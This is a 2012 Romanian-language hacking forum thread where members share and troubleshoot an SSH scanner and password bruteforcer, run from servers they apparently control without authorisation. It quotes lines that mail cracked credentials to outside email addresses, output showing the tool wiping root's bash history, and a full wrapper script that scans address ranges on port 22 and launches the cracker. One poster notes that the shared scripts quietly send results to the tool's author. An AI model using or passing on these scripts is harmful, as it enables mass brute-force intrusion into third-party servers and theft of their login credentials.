SSH Scanner+Bruteforce 2012

[caramea]

Aveti aici un scanner SSH mai nou: Download Scanner SSH + Bruteforcer v2 - 2012.zip

Parola: WTBoS2JGbFlWbnBpTWtaNVdWaENhR050T1hOWlVUMDk=

[hades]

Mai du-te ma.

Nu tu un log cu fisierul scanat, nu tu nimic.

[bc-vnt]

[pukamvp]

hint pass?

[tm03ewn]

Hint1: Same shit de 3x

Hint2 : e prea usoara frate

Am sa incerc scannerul cand ajung acasa ,sunt la un prieten momentan

Edited June 30, 2012 by tm03ewn

[caramea]

@alecseu: Dupa ce ca e moca si e si de calitate mai ai si pretentii. Ce log, ce scanare cand e pe linux? Si in plus te-am obligat eu sa descarci? Eu zic sa iti vezi acolo de treaba ta.

[hades]

E bestial. Scuze ca m-am bagat in seama.

cat vuln.log | sort|uniq|mail -s "ChannelHelp SSHv2" test@test.com &>/dev/null&

[koba]

De ce imi da asa eroare? Ce tre sa fac sa mearga?

[wn] Scanning 62.203 for open ssh ips.

cat: bios.txt: No such file or directory

[sSH] Found 0 ip's

[wn] Cracking started

# DO NOT SHARE THIS FUCKING SHIT

rm: cannot remove `/root/.bash_history': Read-only file system

touch: cannot touch `/root/.bash_history': Read-only file system

[caramea]

E bestial. Scuze ca m-am bagat in seama.

cat vuln.log | sort|uniq|mail -s "ChannelHelp SSHv2" test@test.com &>/dev/null&

Ai citit macar readme.txt?

@koba ai pus corect placa de retea prin care iesi la net?

[hades]

@koba Ai uid0 pe sv? ;\

@caramea: Nu. Nu am citit readme.txt. Multi nu o sa-l citeasca.

[koba]

@caramea , da.

@alecseu ,sunt incepator in astea,stiu doar cateva comenzi si atat...

Edited June 30, 2012 by koba

[caramea]

@koba Ai uid0 pe sv? ;\

@caramea: Nu. Nu am citit readme.txt. Multi nu o sa-l citeasca.

Dar nu ma intereseaza pe mine asta, dupa ce ca e mura in gura, mai are si defecte. Asa e cand postezi pe forumuri romanesti.

@koba: Totusi nu cred ca ai pus corect placa de retea, da un ifconfig.

[koba]

Cred ca am pus corect ,mai am un scaner pe rootul asta si ala merge bine doar ca e incet..

eth0 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:04

inet addr:172.17.3.56 Bcast:172.17.3.255 Mask:255.255.255.0

inet6 addr: fe80::20d:b9ff:fe21:e004/64 Scope:Link

UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1

RX packets:132032845 errors:0 dropped:0 overruns:0 frame:0

TX packets:517955485 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:3628271658 (3.3 GiB) TX bytes:3879094384 (3.6 GiB)

Interrupt:10 Base address:0x8000

eth0:1 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:04

inet addr:172.17.3.49 Bcast:172.17.3.255 Mask:255.255.255.0

UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1

Interrupt:10 Base address:0x8000

eth1 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:05

inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::20d:b9ff:fe21:e005/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:58575121 errors:0 dropped:0 overruns:0 frame:0

TX packets:76984193 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:3597993480 (3.3 GiB) TX bytes:4094441184 (3.8 GiB)

Interrupt:11 Base address:0xc000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:54 errors:0 dropped:0 overruns:0 frame:0

TX packets:54 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:7832 (7.6 KiB) TX bytes:7832 (7.6 KiB)

[caramea]

Incearca si eth1.

[koba]

Incearca si eth1.

am incercat, exact aceeasi eroare.

[koba]

@caramea am incercat pe backtrack, imi da asa eroare ..

Found 1320 ips

Cracking started

Recieved unhandled msg 4

Recieved unhandled msg 4

Recieved unhandled msg 4

si dupa aia s'a oprit

[hades]

@caramea Tu i fi wn a.k.a puricel de pe undernet.

[Caracal]

@koba Ai uid0 pe sv? ;\

@caramea: Nu. Nu am citit readme.txt. Multi nu o sa-l citeasca.

Cum multi nu o sa citeasca nici ce fac scripturile alea p-acolo:

cat vuln.log | mail -s "ChannelHelp Scan Result" [email]estifericit@gmail.com[/email]

in fisierul "clean".

[caramea]

Cum multi nu o sa citeasca nici ce fac scripturile alea p-acolo:

cat vuln.log | mail -s "ChannelHelp Scan Result" [email]estifericit@gmail.com[/email]

in fisierul "clean".

Nu e al meu, merci de observatie. Dar totusi mie nu imi salveaza in vuln.log nimic, doar le afiseaza in consola.

[Caracal]

Nu e al meu, merci de observatie. Dar totusi mie nu imi salveaza in vuln.log nimic, doar le afiseaza in consola.

e comentata linia

#echo "[SSH] Username: $(echo $line |cut -d ":" -f 1) Password: $(echo $line |cut -d ":" -f 2) IP: $(echo $line |cut -d ":" -f 3)" >>vuln.log

din eof. Poti sa stergi mailul ala, sa decomentezi linia si o sa iti faca si vuln.log

[tm03ewn]

Am o problema sa zic asa,am incercat scannerul pe 12+ servere [rooturi],toate aveau eth0 si le , unele aveau eth0 , eth1

dar primesc aceeasi eroare :

tomcat@Caravella:/dev/shm/moloz> ./wn b 208.53 eth0 9
 [SSH] LOADING ....

#####################################
## ChannelHelp @ UNDERNET          ##
## Powered by wn                   ##
## 2012 SSHv2 Bruteforcer          ##
## Contact me at wnback@yahoo.com  ##
#####################################
[wn] Scanning 208.53 for open ssh ips.
cat: bios.txt: No such file or directory
[SSH] Found 0 ip's
[wn] Cracking started
# DO NOT SHARE THIS FUCKING SHIT
rm: cannot lstat `/root/.bash_history': Permission denied
touch: cannot touch `/root/.bash_history': Permission denied

iar dupa ,se opreste:)

La absolut toate rooturile am aceeasi eraore

any toughts?

[hades]

Pentru synscanul ala ai nevoie de eth0 / eth1.

Inlocuieste class cu un pscan2/pscan.

Modifica in wn linia cu "./class bla bla" in ./pscan2 $1 22

Si modifici numele fisierului in care salveaza ip-urile din bios.txt in $1.pscan.22

Mult noroc. ;-)

[tm03ewn]

@alecseu

aproape lafel [2 erori in + ]

 [SSH] LOADING ....

#####################################
## ChannelHelp @ UNDERNET          ##
## Powered by wn                   ##
## 2012 SSHv2 Bruteforcer          ##
## Contact me at wnback@yahoo.com  ##
#####################################
[wn] Scanning 66.5 for open ssh ips.
usec: 1000000, burst packets 50
damn dude, port numbers are in 1 .. 65535
cat: bios.txt: No such file or directory
[SSH] Found 0 ip's
[wn] Cracking started
# DO NOT SHARE THIS FUCKING SHIT
rm: cannot remove `/root/.bash_history': Permission denied
touch: cannot touch `/root/.bash_history': Permission denied

am facut ce mi-ai zis tu.dar nimic

PS : taote serverele pe care am incercat scannerul aveau etho

de exemplu cel pe care il incerc acum :

susan@firefly:/dev/shm/moloz/moloz$ ifconfig
eth0      Link encap:Ethernet  HWaddr 40:40:57:9E:32:F8
          inet addr:208.78.102.27  Bcast:208.78.102.255  Mask:255.255.255.0
          inet6 addr: fe80::4240:57ff:fe9e:32f8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6429567 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4545783 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:691797149 (659.7 MiB)  TX bytes:12823382673 (11.9 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:33255 errors:0 dropped:0 overruns:0 frame:0
          TX packets:33255 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2488755 (2.3 MiB)  TX bytes:2488755 (2.3 MiB)

[hades]

Dude.

Urca-ti un pscan2 in folderul cu scannerul.

Apoi, creaza un fisier "a" (de exemplu).

In fisierul ala 'a' dai c/p la asta:

#!/bin/bash
rm -rf bios.txt mfu.txt *.syn
echo "[wn] Scanning $1 for open ssh ips."
./pscan2 $1 22
cat $1.pscan.22 |sort -u | uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
if [ -f mfu.txt ]; then
echo -e "[SSH] Found $oopsnr2 ip's"
cp mfu.txt $1.syn
echo "[wn] Cracking started"
./update 1500
sleep 30
if [ -f vuln.txt ]; then
echo -e "[SSH] Cleaning Results!"
./clean
else
rm -rf mfu.txt ips
fi
fi

chmod +x a pscan2

./a plm.plm

Uita-te in fisierul clean ca trebuie sa decomentezi o linie si sa stergi un sendmail.

[pyth0n3]

Daca scriptul ala de shell a fost scris de labari ce sa mai spun de executabilele compilate.Sunt compilate si fara sursa deoarece fac wrapping peste wrapping .Parca scriptul de shell a fost scris in assembly pentru o arhitectura specifica .Cat de inteligent poti sa fi sa prezici asemenea comenzi ratate precum "rm /root/.bash_history" si "touch /root/.bash_history" , adica e un standard POSIX sa stochezi comenzile intrun asemenea fisier ? .Si voi restul pe acolo rulati orice cacat fara sa va dati seama ce face.Faceti ce stiti sa faceti lasati balta cacaturile daca nu sunteti in stare.